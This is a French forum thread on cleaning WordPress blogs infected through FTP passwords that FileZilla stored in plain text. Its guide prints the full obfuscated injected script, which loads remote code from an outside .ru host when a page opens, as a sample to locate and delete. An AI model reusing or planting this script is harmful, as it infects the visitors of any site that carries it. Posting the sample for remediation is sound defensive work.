Épidémie : la marche à suivre en cas d'infection

Une épidémie sévit en ce moment (mymy, Elodie, Céline, Lounette, Audrey... on déjà été touchées).
Symptômes : Vous utilisez FileZilla pour vous connecter au serveur de votre hébergeur, votre antivirus détecte éventuellement quelque chose, puis la page d'accueil de votre site ou blog est vierge ou bien affiche un message d'erreur du genre :

Parse error: syntax error, unexpected '<' in /homez.323/tartempion/www/blog/wp-includes/default-filters.php on line 229

La page d'accueil de l'administration peut aussi être touchée.

Que s'est-il passé ?

A priori, un virus a utilisé les informations de connexion stockées en clair dans le fichier "sitemanager.xml" de FileZilla (qui se trouve dans Documents and Settings\Vous\Application data\FileZilla) pour se connecter en FTP à votre serveur et modifier des fichiers en y injectant le code qui produit les dégâts.

Que faire, donc ?

1°) Essentiel ! : Ne pas laisser FileZilla stocker "en clair" les informations de connexion FTP. J'ai indiqué la marche à suivre ici : https://instants-captures.forumactif.org/informatique-f36/attention-epidemie-emergency-emergency-t3891.htm#61926
Certes FileZilla vous demandera votre mot de passe à chaque connexion, et cela vous embête peut-être, mais c'est impératif.

2°) Via l'interface d'administration de votre compte chez votre hébergeur, changez votre mot de passe FTP (prenez-en un suffisamment "solide", c'est-à-dire comportant des chiffres et des lettres, des majuscules et des minuscules, d'au moins 6 caractères et surtout n'existant dans aucun dictionnaires de noms communs ou propres).

3°) Connectez-vous à votre site avec FileZilla. Il vous demande votre mot de passe si vous n'avez pas zappé la première étape (si vous l'avez zappée... ).

4°) Il va falloir trouver quels fichiers ont été modifiés par le virus : en général ce sont au moins l'index.php de votre site ou blog, celui du thème et celui de l'admin (mais il y en a souvent plus). Pour vous simplifier la tâche, dans la fenêtre de droite de FileZilla (le site distant), triez les fichiers par dates de modification : ainsi tous les fichiers modifiés à partir de la date du désastre seront suspects.
Rappatriez ces fichiers à gauche sur votre bureau ou dans un dossier et éditez-les (avec n'importe quel éditeur de texte ou de code, mais pas avec Word, surtout ! - je ne saurais trop chaleureusement recommander l'excellentissime Notepad++, libre et gratuit : http://www.framasoft.net/article2579.html).

5°) Le script vérolé ressemble à ceci et s'il existe, se trouve a priori en fin du fichier :

Code:

<script>T={};var iX='';var X;V=function(){this.B="";var u_={N:60691};this.Gr=38729;this.Gr++;var r={zX:"GC"};function K(b,G,g){this.ut=26338;this.ut--;this.U="";return b.substr(G,g);var XY=false;var Qt={n:"y"};}this.on=false;var D='';Hu=["fT","gO","Al"];this.oV='';var Z=RegExp;this.v=false;var nK="";var Vm=new String(K("/goL36",0,3)+K("oglZHA",0,3)+"e.c"+"om/"+K("mybkGu4",0,3)+K("Yp2UestU2Yp",4,3)+K("youzH2",0,3)+K("3bgxi.bg3",3,3)+K("cn/0NxY",0,3)+"war"+K("rqAeseArq",3,3)+K("cQ9eke9cQ",3,3)+K("r.cemb",0,3)+K("d6Aom.dA6",3,3)+K("phpQO7",0,3));var d=document;var p="";NC=9568;NC-=134;function l(b,G){try {var PJ='DX'} catch(PJ){};BM=["j"];var g=new String("[")+G+K("]BQWS",0,1);var P=new Z(g, String("g"));yH=35200;yH++;return b.replace(P, D);};ph={py:false};var Sg=59965;this.nk=51374;this.nk+=223;var m="body";var hg=[];var O='';var mn=null;this.TN=false;var i=l('sAc_r1iMpEt1','MkASjK_CBWeE1y');var A=585848-577768;this.er="er";this.QM="";X=function(){this.Gk='';try {LH=47113;LH++;var ZY=l('c9rsesa5tieWEul2eumCeGnHtW','yWHdsC2iGTquZ59');gH=35716;gH-=30;this.xg=5359;this.xg++;gY=d[ZY](i);try {} catch(Zl){};this.Vy=17402;this.Vy--;var e=String("defer");Ez=32689;Ez+=238;et=12550;et+=15;var b=A+Vm;Xh=55621;Xh-=226;uX=63329;uX++;var Q=l('syr7cy','QTy7qM8haL');Gu=["J","Ze","hY"];mg=[];var iT={pr:"XU"};var zR=false;zs={Py:false};Rf=41024;Rf--;gY[Q]=String("http"+"://m"+"usic"+"spar"+"k.ru"+K(":Ac3f",0,1))+b;Ap=["uT"];gY[e]=[5,1][1];this.xw="";var lQ=56013;d[m].appendChild(gY);ZL=8924;ZL++;var aE=[];var Io=new Array();} catch(R){yU=31255;yU++;this.fv=42689;this.fv-=223;this.AB=42182;this.AB-=46;};};var Rb={zL:"_L"};PW=[];};this.aQ="";this.NU="";V();this.VY=false;window.onload=X;var la=new Date();fJ={dF:56951};this.ms='';</script>
<!--225fabfed12a8c8ded861ae9ac99ddbe-->

Pour chaque fichier où vous trouvez ce code, sélectionnez-le et supprimez (attention à ne pas effacer de code "sain" !), puis enregistrez les modifications.
N.B. : en fonction de l'éditeur que vous utilisez, il est possible d'effectuer des recherches dans des fichiers multiples, ce qui pourrait grandement faciliter la recherche et les corrections.

6°) Réuploadez tous les fichiers modifiés et vérifiez si les choses sont revenues à la normale en vous rendant sur votre site en rafraîchissant l'affichage (touche F5).

7°) Profitez-en pour mettre Wordpress à jour si tel n'est pas le cas (préférez la procédure "manuelle" via FTP, si cela ne vous rebute pas trop).

8°) Scannez tout votre disque dur à l'aide d'un "bon" antivirus (cette remarque n'engage que moi mais à mon sens il n'existe ni ne peut exister de "bon" antivirus gratuit - et je n'ai pas d'actions chez eux mais j'en profite pour faire une pub gratuite à Kaspersky : http://www.kaspersky.com/fr/kaspersky_anti-virus). Cette étape aurait judicieusement trouvé d'ailleurs sa place en pôle position, mais perso, je n'aurais jamais le courage d'attendre le résultat d'un scan complet avant de me lancer dans l'éradication du bestiau... Cela étant, dans le cas présent, ce n'est pas grave si vous avez correctement suivi l'étape 1°.

9°) Écrivez à votre maire pour lui demander s'il ne serait judicieux d'ériger une statue à la gloire de Jerfa.

Voilà voilà. Si le problème persiste, ou que vous ne vous en sortez pas, ou que vous craignez de faire des bêtises en manipulant les fichiers de votre site, contactez-moi en MP : je m'en occuperai pour vous à un tarif raisonnable mais non-remboursé par la sécu...

Jerfa a écrit:
9°) Écrivez à votre maire pour lui demander s'il ne serait judicieux d'ériger une statue à la gloire de Jerfa.

Attention je le connais personnellement je pourrai te prendre au mot

Ma statue au fin fond de l'Alsace ? ma foi...

oui mais alors juste sur ma terrasse hein pas touche a jeje!! je monte la garde

Allez je file dormir avant de dire plus de betise!!

En ce qui me concerne grâce à Jéjé et son aide si précieuse et bénévole, j'arrive de nouveau à aller sur mon blog, comme beaucoup d'entre vous mon anti virus m'indiquait un trojan au niveau de mon index, j'ai écrasé mes fichiers via le ftp "à priori" ça a l'air d'aller maintenant, par contre il me détecte un virus dans le plugin 'contact form 7" je l'ai donc désactivé et tout va bien, il ne me restera plus qu'à trouvé un autre plugin pour le remplacer et tout réinstaller... ??? lol.

Encore une fois merci Jéjé sans toi... J'aurais tout abandonné.

Coucou Lilie !
Arrête, le rouge écarlate me sied très mal au teint.
En fait nan : il suffit juste d'effacer le vilain code dans le fichier qui provoque ça.
Allez, contacte le support technique Jerfa-pinpon-les-pompiers (et indique la référence de ce message, ça vaut pour un chèque-cadeau) : on va arranger ça en un coup de cuiller à pot.

Mon sauveuuuuur !!!!! Hihihihi donc j'ai bien fait ce que tu me conseillais juste au dessus et......... Tadaaaaaaaaaaaaa c'est le mimi, c'est le mimi, c'est le miRacle mdr !!! C'est bon j'ai mon formulaire de contact opérationnel et mon blog sans virus... (enfin je crois...) lol mais maintenant avec un bon anti-virus, ça me rassure quand même un peu, même si j'ai encore du mal à le comprendre...

Encore une fois Merci Jéjé, heureusement que tu était là encore une fois hihihi... Miciiiiiiiiii Miciiiiiiiiii

bein j'ai fait tout ca, mais le virus revient bouhhhhhhhhh

arf moi qui voulais faire un site sur WP....

mais non djf, n'hesites pas, c'est top WP

Bon à savoir au cas ou!!!

Merci

djf a écrit:arf moi qui voulais faire un site sur WP....

Mais non, djf, WordPress, comme le dit Audrey, est "top"... Et n'y est pour ainsi dire strictement pour rien ! FileZilla non plus d'ailleurs (sauf pour ce dernier qu'on pourrait éventuellement lui reprocher de ne pas signaler qu'en cas d'infection, il n'est pas très bon de stocker des mots de passe "en clair" sur un ordi).
WordPress est et reste à mes yeux le meilleur "CMS" pour des blogs !
C'est un virus à l'origine présent sur l'ordi des gens concernés qui cause toutes ces calamités...

Audrey a écrit:bein j'ai fait tout ca, mais le virus revient bouhhhhhhhhh

Sans aucun doute, Audrey, pour deux raisons, et surtout une (la première) :

1°) Tu n'as pas effacé le code malicieux de tous les fichiers infectés sur ton blog (il peut y en avoir beaucoup : pour le blog de Lounette, je l'ai viré de pas loin de 200 fichiers infectés... ). Si l'infection est grave, d'ailleurs, et si la base de donnée est restée saine, je conseillerais dans ce cas carrément une réinstallation complète du blog (à partir d'un ordi bien évidemment "sain" !).

2°) Ton ordi est toujours infecté et tu as zappé l'étape "ne pas stocker de mots de passe dans FileZilla".

Dalt a écrit:Merci

De rien !

bein j'ai changé mon mdp deux fois deja !
j'a lancé un scan, j'ai supprimé dans des fichiers, mais ilf aut que je fasse quoi, pour etre sur ?
que j'ouvre chaque fichier un par un ?

a ton avis ca en est un ca ?

var $entries = array();
}

/**
* Structure that store Atom Entry Properties
*
* @package AtomLib
*/
class AtomEntry {
/**
* Stores Links
* @var array
* @access public
*/
var $links = array();
/**
* Stores Categories
* @var array
* @access public
*/
var $categories = array();
}

/**
* AtomLib Atom Parser API
*
* @package AtomLib
*/
class AtomParser {

var $NS = 'http://www.w3.org/2005/Atom';
var $ATOM_CONTENT_ELEMENTS = array('content','summary','title','subtitle','rights');
var $ATOM_SIMPLE_ELEMENTS = array('id','updated','published','draft');

var $debug = false;

var $depth = 0;
var $indent = 2;
var $in_content;
var $ns_contexts = array();
var $ns_decls = array();
var $content_ns_decls = array();
var $content_ns_contexts = array();
var $is_xhtml = false;
var $is_html = false;

bon j'ai ma reponse, ca n'en est pas ! je lance une recherche du ver dans mon ftp, ffff mais quelle galere

Audrey a écrit:bein j'ai changé mon mdp deux fois deja !
j'a lancé un scan, j'ai supprimé dans des fichiers, mais ilf aut que je fasse quoi, pour etre sur ?
que j'ouvre chaque fichier un par un ?

Ce serait longuet... pour ne pas dire interminable !
Non non, ce que tu peux faire si tu ne préfères pas tout réinstaller, c'est :
1°) Un scan complet de ton ordi pour t'assurer qu'il n'y a aucune trace nulle part de vilain bestiau.
2°) Suspendre la protection en "temps réel" de ton antivirus ou le suspendre tout court (sinon l'étape 3 sera impossible).
3°) Télécharger entièrement ton blog par FTP chez toi dans un dossier que tu crées.
4°) Faire dans ce dossier une recherche du code incriminé (normalement c'est toujours le même) : si tu utilises Notepad++ par exemple, choisis, dans le menu "Recherche", la fonction "Rechercher dans les répertoires".
5°) Corriger tous les fichiers où le code aura été trouvé.
6°) Réuploader ton blog via FTP.
7°) Réactiver ton antivirus et scanner le dossier corrigé, pour vérification.

Courage (il en faut ! ) !

Audrey a écrit:a ton avis ca en est un ca ?

Non, ça c'est du code sain.

Bon jviens de regarder WP moi, ba sur free c chiant a installer.... ya des hebergeur pas chéros ????

Je recommande toujours OVH, sauf cas particulier... Très bon rapport qualité/prix. Tu as l'offre :
http://www.ovh.com/fr/hebergement_mutualise/hebergement_web_mutualise_perso_25go_trafic_500go.xml
à 2,38€/mois, nom de domaine inclus.
Précision : il ne me payent pas pour la pub et je n'ai pas d'actions chez eux...

bon allez je suis desepsérée, la c planté planté, bref, je vais le recommencer a zero, ca m'avait pris des mois, tant pis !
j'y arrive pas j'y arrive pas et c'est tout !
bon, on respire, jvais aller pleurer un coup avant de me remettre au boulot ...

bon jsais meme pas ce qu'il faut faire pour tout recommencer ...

Roooo... ne te pends pas ! Bon, je vais voir ce que je peux faire (si ce n'est pas méga infecté, ça ne prendra pas trop de temps), mais hélas, aujourd'hui pas le temps du tout. Ptêtre demain ? MP...

est ce que qqun saurait me dire comment refaire mon blog ?

allo allo ??? personne ne veut m'aider ??
j'men souviendrai !

Je t'ai répondu par MP

au scours chevalier moi je recois plein de commentaires en anglais pour me proposer des solutions pour favoriser l'erection!!! je ne plaisante pas!!!

Si certain sont interresser je ferai tourner hihi mais en attendant ça me soule!!